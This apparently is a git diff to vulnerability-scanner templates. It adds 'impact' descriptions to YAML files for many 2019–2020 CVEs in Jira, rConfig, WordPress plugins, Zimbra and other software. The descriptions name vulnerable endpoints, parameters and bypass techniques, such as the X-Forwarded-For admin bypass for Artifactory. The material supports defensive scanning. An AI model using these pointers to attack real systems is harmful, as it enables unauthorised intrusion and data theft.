diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index d4b9e40d57..89d11c29a3 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: medium description: Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information. remediation: | Upgrade Jira to version 8.4.0 or later to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index dd8e8a2557..db52ae8465 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -5,6 +5,8 @@ info: author: TechbrunchFR severity: medium description: Jira before 8.4.0 is susceptible to server-side request forgery. The /plugins/servlet/gadgets/makeRequest resource contains a logic bug in the JiraWhitelist class, which can allow an attacker to access the content of internal network resources and thus modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Upgrade Jira to version 8.4.0 or later to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index fb7cb9cab8..55490e25cb 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: high description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index b39fa59d00..da04524349 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a patched version of HotelDruid or apply appropriate input sanitization to prevent XSS attacks. reference: diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 0cfcdbe715..c176a17757 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery." + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive files and potential server-side request forgery attacks. remediation: | Apply the latest security patches and updates provided by Wavemaker Studio to mitigate these vulnerabilities. reference: 
diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index 9ff4d664af..83cc741e71 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -5,23 +5,25 @@ info: author: pikpikcu severity: high description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patch or upgrade to a newer version of ZZZCMS. reference: - https://www.exploit-db.com/exploits/46454/ - http://www.iwantacve.cn/index.php/archives/118/ - https://nvd.nist.gov/vuln/detail/CVE-2019-9041 - remediation: | - Apply the latest security patch or upgrade to a newer version of ZZZCMS. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-9041 cwe-id: CWE-917 - cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:* epss-score: 0.01127 + cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:* metadata: max-request: 2 - product: zzzphp vendor: zzzcms + product: zzzphp tags: cve,cve2019,zzzcms,rce,edb http: @@ -30,7 +32,6 @@ http: POST /search/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | POST /search/ HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index c308c0b525..2ad4e105b2 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml 
@@ -5,6 +5,8 @@ info: author: ree4pwn severity: critical description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, leading to unauthorized access to sensitive information. remediation: | Upgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index f356b5b6a6..ff6a987275 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system. remediation: | Apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index 15f90d1a07..c42d8056df 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml 
@@ -5,6 +5,8 @@ info: author: akshansh severity: critical description: JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory. + impact: | + Successful exploitation allows unauthorized access to the admin panel. remediation: | Upgrade to a patched version of JFrog Artifactory or apply the necessary security patches. reference: diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index ed0c037ff6..59e76eb84a 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade to the latest version of GetSimple CMS to fix the open redirect vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index 1b317482b8..a73df11600 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! application. remediation: | Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index 41f3796737..1cee80d64a 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0 severity: medium description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the Social Warfare plugin to version 3.5.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index 363f686b70..f07d6dbd89 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml 
@@ -5,6 +5,8 @@ info: author: joeldeleep severity: high description: Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index e3adee1559..f50304dc02 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the SolarWinds Orion system. remediation: | Apply the necessary patches or updates provided by SolarWinds to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index c1d059a349..5c7d2b9353 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml 
@@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob,pdresearch severity: high description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Sonatype Nexus Repository Manager 3. reference: diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index de8d836ec7..ac2070ef6e 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 9ac0547a4a..4e6392607d 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade to the latest version of rConfig or apply the provided patch to fix the SQL Injection vulnerability. reference: 
diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index e067f01b4a..1960c821d0 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade to the latest version of rConfig or apply the provided patch to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index 73a02ae839..e3e2fe6f85 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade to a patched version of rConfig or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index 7c652142eb..1114c96b16 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and prior has unauthenticated snippets.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade rConfig to version >3.9.4 or apply the provided patch to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index 7e6ffcad9d..d429965324 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, or further attacks. remediation: | Upgrade Keycloak to a version higher than 12.0.1 to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index 2cb5f89a01..c02e8d3ff9 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected device. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index bbff6106f8..626eeb6c80 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: Upgrade to version 9.4.6 or later. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 9ec3a3d338..a27ee13751 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml 
@@ -5,6 +5,8 @@ info: author: emadshanab severity: medium description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: This issue can be resolved by updating Grafana to the latest version. reference: - https://github.com/grafana/grafana/pull/23254 diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 6703839e83..4a134b032f 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -6,6 +6,8 @@ info: severity: high description: | MicroStrategy Web 10.4 is susceptible to information disclosure. The JVM configuration, CPU architecture, installation folder, and other information are exposed through /MicroStrategyWS/happyaxis.jsp. An attacker can use this vulnerability to learn more about the application environment and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. remediation: Mitigated in all versions 11.0 and higher. reference: - http://packetstormsecurity.com/files/157068/MicroStrategy-Intelligence-Server-And-Web-10.4-XSS-Disclosure-SSRF-Code-Execution.html diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index f39509143e..308baff221 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server. remediation: | Upgrade to the latest version of LimeSurvey (4.1.12 or higher) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml index bfe91be835..22ddb7357b 100644 --- a/http/cves/2020/CVE-2020-11529.yaml +++ b/http/cves/2020/CVE-2020-11529.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade Grav CMS to version 1.7 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 9ec4e15b97..2138f6a6f4 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Update to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 7b97dcb712..ff88b81b8a 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -5,6 +5,8 @@ info: author: Official_BlackHat13 severity: critical description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to the latest version of SuperWebmailer to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 103e8ce607..bab32f3e95 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml 
@@ -5,6 +5,8 @@ info: author: x6263 severity: medium description: PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the PRTG Network Monitor. remediation: | Upgrade PRTG Network Monitor to version 20.1.57.1745 or higher to mitigate the information disclosure vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index 9375ed7d91..c49c1ce138 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1. + impact: | + Remote attackers can gain unauthorized administrative access to the Kong Admin API. remediation: | Upgrade to Kong version 2.0.3 or later to fix the vulnerability and ensure proper authentication and access control mechanisms are in place. reference: diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index 92190b5b1a..7250d64907 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml 
@@ -8,6 +8,8 @@ info: WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation. remediation: | Update the WordPress Duplicator plugin to the latest version (1.3.27 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index f91c2de8a3..ac82f6acc9 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories. + impact: | + An attacker can exploit this vulnerability to view, modify, or delete arbitrary files on the system, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access. reference: diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 1b56a867de..fcf36bdfea 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Micro Focus Operations Bridge Manager in versions 2020.05 and below is vulnerable to remote code execution via UCMDB. The vulnerability allows remote attackers to execute arbitrary code on affected installations of Data Center Automation. An attack requires network access and authentication as a valid application user. Originated from Metasploit module (#14654). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Micro Focus Operations Bridge Manager. reference: diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index ca58dfa05d..63f32c22af 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Micro Focus UCMDB is susceptible to remote code execution. Impacted products include Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions, and Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.), and Application Performance Management versions 9,51, 9.50 and 9.40 with UCMDB 10.33 CUP 3. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Micro Focus to fix this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index d94be96c6c..4832e36ce6 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: high description: Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. reference: - https://github.com/pberba/CVE-2020-11978 diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 9cb60ee8ce..9a0ef792f2 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: Upgrade to Apache Cocoon 2.1.13 or later. reference: - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 5b617f70fe..4445963f14 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress Catch Breadcrumb plugin (1.5.4 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index 473e6bb038..392e5f80cd 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 8dc8aaf297..b768df1815 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index 4819141651..39edb109f8 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. + impact: | + An attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation. remediation: | Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index ad2d30f4e3..c60b5d4edf 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml 
